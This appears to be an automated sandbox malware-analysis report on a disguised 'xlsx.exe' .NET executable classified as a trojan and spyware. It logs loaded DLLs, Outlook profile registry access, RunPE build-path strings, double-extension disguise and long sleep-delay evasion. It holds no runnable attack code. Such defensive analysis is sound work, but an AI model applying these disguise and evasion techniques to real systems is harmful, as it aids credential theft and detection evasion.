                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DC74433Y7889021.xlsx.exe.log
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Mutant created: NULL
                    Source: DC74433Y7889021.xlsx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DC74433Y7889021.xlsx.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File read: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Process created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: riched20.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: usp10.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: msls31.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: textinputframework.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: coremessaging.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Automated click: Continue (64 identical entries)
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: DC74433Y7889021.xlsx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DC74433Y7889021.xlsx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb | source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688208679.0000000005620000.00000004.08000000.00040000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb | source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdbt | source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
                    Source: DC74433Y7889021.xlsx.exe | Static PE information: 0xA8818C66 [Sat Aug 2 15:06:14 2059 UTC]
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 0_2_072375F3 push eax; retf 0_2_072375F9
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 0_2_07230006 push ss; retf 0_2_0723001D
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 0_2_0723CA9D push FFFFFF8Bh; iretd 0_2_0723CA9F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B891E pushad ; iretd 1_2_023B891F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B8C2F pushfd ; iretd 1_2_023B8C30
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_023B8DDF push esp; iretd 1_2_023B8DE0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_060E9241 push es; ret 1_2_060E9244
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_08F87860 push es; ret 1_2_08F87870
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 1_2_090D12B1 push es; ret 1_2_090D12D0
                    Source: DC74433Y7889021.xlsx.exe | Static PE information: section name: .text entropy: 7.549042885897216

                    Hooking and other Techniques for Hiding and Protection

                    Source: Possible double extension: xlsx.exe | Static PE information: DC74433Y7889021.xlsx.exe
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: 2B50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: 2CE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: 4CE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: 2260000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: 2430000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Memory allocated: 4430000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599859
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599737
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599609
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599499
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599390
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599281
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599171
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 599062
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598953
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598843
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598734
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598624
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598515
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598406
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598296
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598187
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 598078
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597964
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597843
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597734
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597625
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597515
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597404
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597294
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597172
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 597046
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596937
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596828
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596713
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596593
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596484
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596374
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596265
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596156
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 596046
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595937
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595828
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595718
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595609
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595500
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595390
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595281
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595171
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 595062
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 594951
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 594843
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 594734
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 594624
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Thread delayed: delay time: 594515
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Window / User API: threadDelayed 1845
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Window / User API: threadDelayed 7997
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe Window / User API: foregroundWindowGot 1588
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 5480 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 2640 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -28592453314249787s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599859s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599737s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599609s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599499s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599390s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599281s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599171s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -599062s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598953s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598843s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598734s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598624s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598515s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598406s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598296s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598187s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -598078s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597964s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597843s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597734s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597625s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597515s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597404s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597294s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597172s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -597046s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596937s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596828s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596713s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596593s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596484s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596374s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596265s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596156s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -596046s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595937s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595828s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595718s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595609s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595500s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595390s >= -30000s
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe TID: 7316 Thread sleep time: -595281s >= -30000s
